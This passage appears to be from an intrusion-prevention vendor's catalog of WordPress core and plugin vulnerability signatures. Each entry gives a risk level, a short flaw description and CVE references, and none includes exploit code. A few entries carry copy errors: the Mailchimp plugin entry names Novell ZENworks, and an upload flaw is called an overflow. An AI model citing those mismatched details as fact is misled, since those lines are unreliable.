Situation: HTTP_CSH-Wordpress-Contact-Form-Entries-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2021-25080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25080
Back to top

Wordpress-Core-Avatar-Block-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project WordPress
Risk: Moderate
First detected in: sgpkg-ips-1730-5242
Last changed: sgpkg-ips-1730-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper validation of avatar blocks causes a stored cross-site scripting vulnerability in WordPress. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Wordpress-Core-Avatar-Block-Stored-Cross-Site-Scripting
References:
CVE-2024-4439
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4439
Back to top

Wordpress-Core-External-Entity-Injection

About this vulnerability: A vulnerability in WordPress Project WordPress
Risk: Moderate
First detected in: sgpkg-ips-1345-5242
Last changed: sgpkg-ips-1345-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper validation of XML data in RIFF WAV file metadata causes an entity injection vulnerability in Wordpress Core. A successful exploit allows an attacker to access files on the target system.
Situation: File-RIFF_Wordpress-Core-External-Entity-Injection
References:
CVE-2021-29447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29447
Back to top

Wordpress-Core-Post-Slug-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project WordPress
Risk: Moderate
First detected in: sgpkg-ips-1430-5242
Last changed: sgpkg-ips-1430-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper validation of received post slugs causes a cross-site scripting vulnerability in WordPress. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Wordpress-Core-Post-Slug-Stored-Cross-Site-Scripting
References:
CVE-2022-21662
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21662
Back to top

Wordpress-Database-Backup-RCE

About this vulnerability: A vulnerability in WordPress
Risk: High
First detected in: sgpkg-ips-1196-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A vulnerability in WordPress, versions before 5.2 which allows remote attackers to execute arbitrary commands through the wp_db_exclude_table parameter, due to unsufficient validation of user input.
Situation: HTTP_CRL-Wordpress-Database-Backup-RCE
Back to top

Wordpress-Download-Manager-Plugin-Attach-File-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project Download Manager Plugin for WordPress
Risk: Moderate
First detected in: sgpkg-ips-1419-5242
Last changed: sgpkg-ips-1419-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitization of user-supplied data in the Attach File section of the Download manager plugin for Wordpress causes a cross-site scripting vulnerability. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Wordpress-Download-Manager-Plugin-Attach-File-Stored-Cross-Site-Scripting
References:
CVE-2021-24773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24773
Back to top

Wordpress-Download-Manager-Plugin-Package-Settings-Stored-XSS

About this vulnerability: A vulnerability in WordPress Project Download Manager Plugin for WordPress
Risk: Moderate
First detected in: sgpkg-ips-1407-5242
Last changed: sgpkg-ips-1407-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitization of user-supplied data in Package Settings causes a cross-site scripting vulnerability in Download Manager Plugin for WordPress.
Situation: File-Text_Wordpress-Download-Manager-Plugin-Package-Settings-Stored-XSS
References:
CVE-2021-24773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24773
Back to top

Wordpress-Download-Manager-Unauthenticated-Remote-File-Upload

About this vulnerability: A vulnerability in Wordpress Download Manager
Risk: High
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: Wordpress Download Manager
Type: Insecure Configuration
Description: There exists a overflow vulnerability Wordpress Download Manager, versions before 2.7.5, which allows unauthenticated users to upload arbitrary files which could lead to remote code execution.
Situation: HTTP_CS_Wordpress-Download-Manager-Unauthenticated-Remote-File-Upload
Back to top

Wordpress-Download-Monitor-Plugin-Post_Title-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project Download Monitor Plugin for WordPress
Risk: Moderate
First detected in: sgpkg-ips-1440-5242
Last changed: sgpkg-ips-1440-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitization of user-supplied data in the post_title parameter of certain requests causes a stored cross-site scripting vulnerability in the Download Monitor Plugin for WordPress. A successful exploitation can allow an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Wordpress-Download-Monitor-Plugin-Post_Title-Stored-Cross-Site-Scripting
References:
CVE-2021-23174
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23174
Back to top

Wordpress-Drag-And-Drop-Multi-File-Uploader-RCE

About this vulnerability: An attempt to exploit a vulnerability in Wordpress Drag And Drop Plugin
Risk: High
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1340-5242
Platform: Generic
Software: Wordpress Drag And Drop Plugin
Type: Input Validation
Description: There exists a vulberability in Wordpress Drag And Drop Plugin, versions before 1.3.4, which allows remote attackers to execute arbitrary PHP code by uploading a PHP file with a % character appended to the .php file extension.
Situation: HTTP_CS-Wordpress-Drag-And-Drop-Multi-File-Uploader-RCE
References:
CVE-2020-12800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12800
Back to top

Wordpress-DukaPress-Plugin-Directory-Traversal

About this vulnerability: A Wordpress DukaPress Plugin Directory Traversal vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-769-5211
Last changed: sgpkg-ips-1638-5242
Platform: Generic
Software: WordPress DukaPress
Type: Directory Traversal
Description: A vulnerability in the WordPress DukaPress Plugin, versions before 2.5.4, which allows remote attackers to read arbitrary files via a directory traversal in the src parameter to lib/dp_image.php.
References:
CVE-2014-8799
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8799
OSVDB-115130
http://www.osvdb.org/115130
Back to top

Wordpress-EasyCart-Plugin-Privilege-Escalation

About this vulnerability: Wordpress EasyCart Plugin Privilege Escalation vulnerability.
Risk: High
First detected in: sgpkg-ips-685-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress EasyCart
Type: Input Validation
Description: A validation vulnerability exists in WordPress EasyCart 1.1.30 to 3.0.20 that allows remote attackers of any user level to set any system option via a lac of validation through the ec_ajax_update_option and ec_ajax_clear_all_taxrates functions located in /inc/admin/admin_ajax_functions.php.
Situation: HTTP_CRL-Wordpress-EasyCart-Plugin-Privilege-Escalation
References:
CVE-2015-2673
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2673
Back to top

Wordpress-Email-Subscribers-And-Newsletters-Hash-SQLi-Scanner

About this vulnerability: An attempt to scan WordPress Email Subscribers and Newsletters plugin
Risk: High
First detected in: sgpkg-ips-1338-5242
Last changed: sgpkg-ips-1338-5242
Platform: Generic
Software: WordPress Subscribers And Newsletters Plugin
Type: SQL Injection
Description: There exists a vulberability in WordPress Subscribers And Newsletters Plugin, versions before 4.3.1, which allows remote attackers to scan by unathenticated SQL injection via the hash parameter.
Situation: HTTP_CS-Wordpress-Email-Subscribers-And-Newsletters-Hash-SQLi-Scanner
References:
CVE-2019-20361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20361
Back to top

Wordpress-Email-Template-Designer-Plugin-Authentication-Bypass

About this vulnerability: A vulnerability in WordPress Project WordPress Email Template Designer - WP HTML Mail Plugin
Risk: Moderate
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1444-5242
Platform: Generic
Software: WordPress
Type: Malfunction
Description: Lack of proper authentication on REST-API endpoints created by the Template Designer plugin causes an authentication bypass vulnerability in Wordpress. A successful exploit allows an attacker to execute arbitrary scripts in an admin user's browser.
Situation: HTTP_CS-Wordpress-Email-Template-Designer-Plugin-Authentication-Bypass
References:
CVE-2022-0218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0218
Back to top

Wordpress-Events-Made-Easy-Plugin-Lang-SQL-Injection

About this vulnerability: A vulnerability in Wordpress Project Events Made Easy
Risk: Moderate
First detected in: sgpkg-ips-1486-5242
Last changed: sgpkg-ips-1486-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Improper input validation for the lang parameter causes an SQL injection vulnerability in the Events Made Easy plugin for Wordpress. A successful exploit allows an attacker to execute arbitrary SQL in the database on the target server.
Situation: HTTP_CRL-Wordpress-Events-Made-Easy-Plugin-Lang-SQL-Injection
References:
CVE-2022-1905
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1905
Back to top

Wordpress-File-Manager-Advanced-Shortcode-RCE

About this vulnerability: An attempt to exploit a vulnerability in WordPress File Manager Advanced Shortcode Plugin detected
Risk: High
First detected in: sgpkg-ips-1729-5242
Last changed: sgpkg-ips-1729-5242
Platform: Generic
Software: WordPress File Manager Advanced Shortcode Plugin
Type: Input Validation
Description: A vulnerability in WordPress File Manager Advanced Shortcode Plugin, versions 2.3.2 and before, which allows remote attackers to execute arbitrary code due to the insufficient validation of allowed MIME types when uploading files.
Situation: HTTP_CS-Wordpress-File-Manager-Advanced-Shortcode-RCE
References:
CVE-2023-2068
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2068
Back to top

Wordpress-File-Manager-Plugin-RCE-CVE-2020-25213

About this vulnerability: A vulnerability in WordPress File Manager Plugin
Risk: High
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress File Manager Plugin
Type: Insecure Configuration
Description: There exists a vulnerability in WordPress File Manager plugin, versions prior to 6.9. Successful exploitation allows remote attackers to upload files and execute arbitrary PHP code.
Situation: HTTP_CRL-Wordpress-File-Manager-Plugin-RCE-CVE-2020-25213
References:
CVE-2020-25213
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25213
Back to top

Wordpress-Forminator-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Forminator Plugin
Risk: High
First detected in: sgpkg-ips-1632-5242
Last changed: sgpkg-ips-1632-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported for the WordPress plugin Forminator. This vulnerability is due to improper input validation of the pre-populated query parameters. A remote, unauthenticated attacker could exploit this vulnerability by enticing a victim to click a malicious link. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: File-Text_Wordpress-Forminator-Plugin-Reflected-Cross-Site-Scripting
References:
CVE-2023-3134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3134
Back to top

Wordpress-Forminator-Plugin-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project Forminator Plugin
Risk: Moderate
First detected in: sgpkg-ips-1733-5242
Last changed: sgpkg-ips-1733-5242
Platform: Generic
Software: WordPress Project Forminator Plugin
Type: Input Validation
Description: Insufficient validation of the user input in the request parameters causes an SQL injection vulnerability in the WordPress Forminator Plugin. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-Forminator-Plugin-SQL-Injection
References:
CVE-2024-31077
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31077
Back to top

Wordpress-GDPR-Cookie-Consent-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Webtoffee GDPR Cookie Consent Plugin
Risk: Moderate
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: There exists a stored cross-site scripting vulnerability in the GDPR Cookie Consent Plugin for WordPress. Successful exploitation could lead in arbitrary script execution.
Situation: HTTP_CRL-Wordpress-GDPR-Cookie-Consent-Plugin-Stored-Cross-Site-Scripting
Back to top

Wordpress-Google-Maps-Plugin-SQL-Injection

About this vulnerability: A vulnerability in WordPress Google Maps Plugin
Risk: High
First detected in: sgpkg-ips-1198-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress Google Maps Plugin
Type: Input Validation
Description: A vulnerability in the WordPress Google Maps Plugin, versions 7.11.00 through 7.11.17, which allows remote attackers to perform SQL injections via the REST API in the fields parameter.
Situation: HTTP_CSU-Wordpress-Google-Maps-Plugin-SQL-Injection
References:
CVE-2019-10692
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10692
Back to top

Wordpress-Google-Tag-Manager-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in the Wordpress Google Tag Manager Plugin.
Risk: High
First detected in: sgpkg-ips-1481-5242
Last changed: sgpkg-ips-1481-5242
Platform: Generic
Software: Wordpress Google Tag Manager Plugin
Type: Cross-site Scripting
Description: A vulnerability in the WordPress Google Tag Manager for WordPress Plugin, versions prior to 1.15.1, which allows remote attackers to execute arbitrary scripts in the target users browser, by enticing the target user to click on a crafted link, due to insufficient validation of site search requests.
Situation: HTTP_CSU-Wordpress-Google-Tag-Manager-Plugin-Reflected-Cross-Site-Scripting
References:
CVE-2022-1707
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1707
Back to top

Wordpress-Hash-Form-Plugin-RCE

About this vulnerability: An attempt to exploit a vulnerability in the WordPress Hash Form plugin detected
Risk: High
First detected in: sgpkg-ips-1742-5242
Last changed: sgpkg-ips-1742-5242
Platform: Linux; Windows
Software: WordPress Hash Form Plugin
Type: Input Validation
Description: A vulnerability in the WordPress Hash Form plugin which allows remote attackers to execute arbitrary code by uploading malicious files, due to missing file type validation in the file_upload_action function.
Situation: HTTP_CRL-Wordpress-Hash-Form-Plugin-RCE
References:
CVE-2024-5084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5084
Back to top

Wordpress-Holding-Pattern-Theme-Arbitrary-File-Upload

About this vulnerability: Wordpress Holding Pattern Theme Arbitrary File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-686-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress Holding Pattern
Type: Insecure Configuration
Description: An unrestricted file upload vulnerability exists in Wordpress Holding Pattern Theme 0.6 and earlier, do to the lack of file type verification, which allows remote attackers to execute arbitrary PHP code by uploading a file with a PHP extension and then accessing it via a request to the file name.
Situation: HTTP_CS-Wordpress-Holding-Pattern-Theme-Arbitrary-File-Upload
References:
CVE-2015-1172
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1172
BID-72546
http://www.securityfocus.com/bid/72546
Back to top

Wordpress-Husky-Products-Filter-Plugin-Local-File-Inclusion-CVE-2025-1661

About this vulnerability: A vulnerability in WordPress Husky Products Filter plugin
Risk: High
First detected in: sgpkg-ips-1870-5242
Last changed: sgpkg-ips-1870-5242
Platform: Generic
Software: WordPress Project Husky Products Filter Plugin
Type: Input Validation
Description: A local file inclusion vulnerability has been reported in the Husky Products Filter plugin for WordPress. This vulnerability is due to improper input validation of the template parameter. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in sensitive information disclosure, and in the worst case execution of arbitrary code.
Situation: HTTP_CRL-Wordpress-Husky-Products-Filter-Plugin-Local-File-Inclusion-CVE-2025-1661
References:
CVE-2025-1661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-1661
Back to top

Wordpress-Husky-Products-Filter-Plugin-Woof_Author-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project Husky Products Filter Plugin
Risk: Moderate
First detected in: sgpkg-ips-1768-5242
Last changed: sgpkg-ips-1768-5242
Platform: Generic
Software: WordPress Project Husky Products Filter Plugin
Type: Input Validation
Description: Improper input validation of the woof_author parameter causes an SQL injection vulnerability in Husky Products Filter Plugin for WordPress. A successful exploitation allows an attacker to execute arbitrary SQL on the target database.
Situation: HTTP_CRL-Wordpress-Husky-Products-Filter-Plugin-Woof_Author-SQL-Injection
References:
CVE-2024-6457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6457
Back to top

Wordpress-InfiniteWP-Client-Authentication-Bypass

About this vulnerability: A vulnerability in WordPress InfiniteWP
Risk: High
First detected in: sgpkg-ips-1224-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress InfiniteWP
Type: Insecure Configuration
Description: There exists a vulnerability in the WordPress InfiniteWP Client plugin, WordPress versions 4.9 and greater, which allows remote attackers to bypass authentication and execute arbitrary PHP code.
Situation: HTTP_CRL-Wordpress-InfiniteWP-Client-Authentication-Bypass
Back to top

Wordpress-Infusionsoft-Gravity-Forms-PHP-Upload

About this vulnerability: A Wordpress Infusionsoft Gravity Forms PHP Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Wordpress Infusionsoft Gravity Forms
Type: Input Validation
Description: A vulnerability in Wordpress Infusionsoft Gravity Forms plugin, versions 1.5.3 to 1.5.10, that allows remote attackers to upload and execute arbitrary PHP code due to insufficient user input sanitization and the lack of proper access restriction.
Situation: HTTP_CRL-Wordpress-Infusionsoft-Gravity-Forms-PHP-Upload
References:
CVE-2014-6446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6446
OSVDB-112171
http://www.osvdb.org/112171
Back to top

Wordpress-Kadence-Blocks-Plugin-Advanced-Form-Unrestricted-File-Upload

About this vulnerability: A vulnerability in WordPress Kadence Blocks Plugin
Risk: High
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1629-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An unrestricted file upload vulnerability has been reported in the WordPress Kadence Blocks plugin. The vulnerability is due to a design weakness when handling advanced forms file uploads. A remote, unauthenticated attacker could exploit this vulnerability by uploading a crafted file via an advanced form. Successfully exploiting this vulnerability could result in remote code execution under the security context of the PHP interpreter.
Situation: HTTP_CS-Wordpress-Kadence-Blocks-Plugin-Advanced-Form-Unrestricted-File-Upload
Back to top

Wordpress-Ketchup-Restaurant-Reservations-Plugin-Data-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project Ketchup Restaurant Reservations Plugin
Risk: Moderate
First detected in: sgpkg-ips-1518-5242
Last changed: sgpkg-ips-1518-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitation of the user-supplied 'data' parameter causes a cross-site scripting vulnerability in the WordPress Project Ketchup Restaurant Reservations Plugin. A successful exploit allows an attacker to execute arbitrary scripts on a user's browser.
Situation: HTTP_CRL-Wordpress-Ketchup-Restaurant-Reservations-Plugin-Data-XSS
References:
CVE-2022-2753
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2753
Back to top

Wordpress-Ketchup-Restaurant-Reservations-Plugin-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project Ketchup Restaurant Reservations Plugin
Risk: Moderate
First detected in: sgpkg-ips-1511-5242
Last changed: sgpkg-ips-1511-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitation of user-supplied data causes an SQL injection vulnerability in the Ketchup Restaurant Reservations Plugin of WordPress. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Wordpress-Ketchup-Restaurant-Reservations-Plugin-SQL-Injection
References:
CVE-2022-2754
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2754
Back to top

Wordpress-KingComposer-Plugin-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress KingComposer plugin
Risk: Moderate
First detected in: sgpkg-ips-1365-5242
Last changed: sgpkg-ips-1365-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported in the WordPress KingComposer plugin versions prior to 2.9.5. Successful exploitation could result in the execution of script code in security context of the target user's browser.
Situation: HTTP_CRL-Wordpress-KingComposer-Plugin-Reflected-Cross-Site-Scripting
References:
CVE-2020-15299
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15299
Back to top

Wordpress-Layerslider-Plugin-SQL-Injection-CVE-2024-2879

About this vulnerability: A vulnerability in WordPress LayerSlider plugin
Risk: High
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An SQL injection vulnerability has been reported in WordPress LayerSlider plugin versions 7.9.11-7.10.0.
Situation: HTTP_CRL-Wordpress-Layerslider-Plugin-SQL-Injection-CVE-2024-2879
References:
CVE-2024-2879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2879
Back to top

Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection

About this vulnerability: A vulnerability in WordPress Project LearnPress Plugin
Risk: High
First detected in: sgpkg-ips-1681-5242
Last changed: sgpkg-ips-1681-5242
Platform: Generic
Software: WordPress Project LearnPress Plugin
Type: Input Validation
Description: An SQL injection vulnerability has been reported in LearnPress Plugin for WordPress. The vulnerability is due to insufficient user input validation in the handle_params_for_query_courses() function. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted request to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.
Situation: HTTP_CS-Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection
HTTP_CRL-Wordpress-Learnpress-Plugin-Handle_params_For_Query_courses-SQL-Injection
References:
CVE-2023-6567
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6567
Back to top

Wordpress-Learnpress-Plugin-Profile-Settings-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project LearnPress Plugin
Risk: Moderate
First detected in: sgpkg-ips-1404-5242
Last changed: sgpkg-ips-1404-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: Insufficient sanitization of user-supplied data in the Profile Settings page causes a cross-site scripting vulnerability in the Wordpress Learnpress Plugin.
Situation: HTTP_CS-Wordpress-Learnpress-Plugin-Profile-Settings-Stored-Cross-Site-Scripting
References:
CVE-2021-39348
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39348
Back to top

Wordpress-Learnpress-Plugin-SQL-Injection-CVE-2024-8522

About this vulnerability: A vulnerability in WordPress LearnPress plugin
Risk: High
First detected in: sgpkg-ips-1782-5242
Last changed: sgpkg-ips-1782-5242
Platform: Generic
Software: WordPress Project LearnPress Plugin
Type: Input Validation
Description: A pre-authentication SQL injection vulnerability has been reported in LearnPress plugin for WordPress. The vulnerability is due to insufficient user input validation of c_only_fields. Successful exploitation could result in arbitrary SQL command execution against the target server's database.
Situation: HTTP_CRL-Wordpress-Learnpress-Plugin-SQL-Injection-CVE-2024-8522
References:
CVE-2024-8522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8522
Back to top

Wordpress-Limit-Login-Attempts-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Limit Login Attempts Plugin
Risk: High
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been discovered in WordPress Limit Login Attempts Plugin. The vulnerability is due to improper input validation. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target system. Successful exploitation could result in stored cross-site scripting. The vendor has released a patch to address this vulnerability in plugin version 1.7.2.
Situation: HTTP_CSH-Wordpress-Limit-Login-Attempts-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2023-1861
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1861
Back to top

Wordpress-LiteSpeed-Cache-Plugin-Cross-Site-Scripting-CVE-2023-40000

About this vulnerability: A vulnerability in WordPress LiteSpeed Cache plugin
Risk: Moderate
First detected in: sgpkg-ips-1728-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in WordPress LiteSpeed Cache plugin versions through 5.7.
Situation: HTTP_CRL-Wordpress-LiteSpeed-Cache-Plugin-Cross-Site-Scripting-CVE-2023-40000
References:
CVE-2023-40000
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40000
Back to top

Wordpress-Long-Password-DoS

About this vulnerability: A vulnerability in WordPress.
Risk: High
First detected in: sgpkg-ips-1422-5242
Last changed: sgpkg-ips-1422-5242
Platform: Generic
Software: WordPress
Type: Malfunction
Description: A vulnerability in WordPress, versions before 3.7.5, 3.8.x before 3.8.5, 3.9.x before 3.9.3, and 4.x before 4.0.1, allows remote attackers to cause a denial of service condition by sending a long password, due to the improper handling during hashing.
Situation: HTTP_CRL-Wordpress-Long-Password-DoS
References:
CVE-2014-9034
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9034
Back to top

Wordpress-Mailchimp-Subscribe-Forms-Php-Code-Execution

About this vulnerability: A vulnerability in Novell ZENworks Configuration Management
Risk: High
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: WordPress Project MailChimp Subscribe Forms Plugin
Type: Input Validation
Description: A PHP code execution vulnerability has been reported in Wordpress plugin MailChimp Subscribe Forms. The vulnerability is due to insufficient validation of user-controlled email address when handling subscribe requests. An unauthenticated remote attacker can exploit this vulnerability by sending an HTTP request with a crafted "email" field to the target server. Successful attack could result in PHP code injection and execution on the target WordPress server.
Situation: HTTP_CRL-Wordpress-Mailchimp-Subscribe-Forms-Php-Code-Execution
References:
OSVDB-121081
http://www.osvdb.org/121081
Back to top

Wordpress-MasterStudy-Admin-Account-Creation

About this vulnerability: A vulnerability in the WordPress MasterStudy Plugin.
Risk: High
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Platform: Generic
Software: WordPress MasterStudy Plugin
Type: Input Validation
Description: A vulnerability in the WordPress MasterStudy Plugin, versions before 2.7.6, which allows remote attackers to create administrator accounts for WorPress itself, due to insufficient validation of certain parameters.
Situation: HTTP_CRL-Wordpress-MasterStudy-Admin-Account-Creation
References:
CVE-2022-0441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0441
Back to top

Wordpress-Metform-Elementor-Plugin-Form-data.php-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project Metform Elementor Contact Form Builder Plugin
Risk: High
First detected in: sgpkg-ips-1573-5242
Last changed: sgpkg-ips-1573-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for the WordPress Metform Elementor Contact Form Builder plugin. This vulnerability is due to insufficient validation of user supplied data parameter when handling form submission requests. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in the execution of script code in the security context of a target user's browser.
Situation: HTTP_CRL-Wordpress-Metform-Elementor-Plugin-Form-data.php-Stored-Cross-Site-Scripting
References:
CVE-2023-0084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0084
Back to top

Wordpress-Modern-Events-Calendar-Lite-Plugin-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in WordPress Project Modern Events Calendar Lite
Risk: Moderate
First detected in: sgpkg-ips-1457-5242
Last changed: sgpkg-ips-1457-5242
Platform: Generic
Software: Wordpress Modern Events Calendar Plugin
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for the WordPress plugin Modern Events Calendar Lite. This vulnerability is due to improper input validation for multiple parameters in the Hourly Schedule section. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary script execution in the context of the victim's browser.
Situation: HTTP_CRL-Wordpress-Modern-Events-Calendar-Lite-Plugin-Stored-Cross-Site-Scripting
References:
CVE-2022-0364
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0364
Back to top

Wordpress-Modern-Events-Calendar-SQLi-Scanner

About this vulnerability: A vulnerability in the WordPress Modern Events Calendar plugin.
Risk: High
First detected in: sgpkg-ips-1444-5242
Last changed: sgpkg-ips-1444-5242
Platform: Generic
Software: Wordpress Modern Events Calendar Plugin
Type: SQL Injection
Description: A vulnerability in the WordPress Modern Events Calendar plugin, versions before 6.1.5, which allows remote attackers to execute SQL commands via the time parameter, due to insufficient validation.
Situation: HTTP_CSU-Wordpress-Modern-Events-Calendar-SQLi-Scanner
References:
CVE-2021-24946
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24946
Back to top

Wordpress-Multiple-File-Load-DoS-CVE-2018-6389

About this vulnerability: A vulnerability in Wordpress
Risk: Moderate
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: A request to load multiple registered js files can be used to cause a denial of service condition in Wordpress.
Situation: HTTP_CRL-Wordpress-Multiple-File-Load-DoS-CVE-2018-6389
References:
CVE-2018-6389
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Back to top

Wordpress-My-Calendar-Plugin-My_calendar_rest_route-SQL-Injection

About this vulnerability: A vulnerability in WordPress My Calendar plugin
Risk: High
First detected in: sgpkg-ips-1673-5242
Last changed: sgpkg-ips-1673-5242
Platform: Generic
Software: WordPress
Type: Input Validation
Description: An SQL injection vulnerability has been reported in the WordPress plugin My Calendar. This vulnerability is due to improper input validation in the my_calendar_rest_route function. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in SQL injection.
Situation: HTTP_CSU-Wordpress-My-Calendar-Plugin-My_calendar_rest_route-SQL-Injection
References:
CVE-2023-6360
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-6360
Back to top

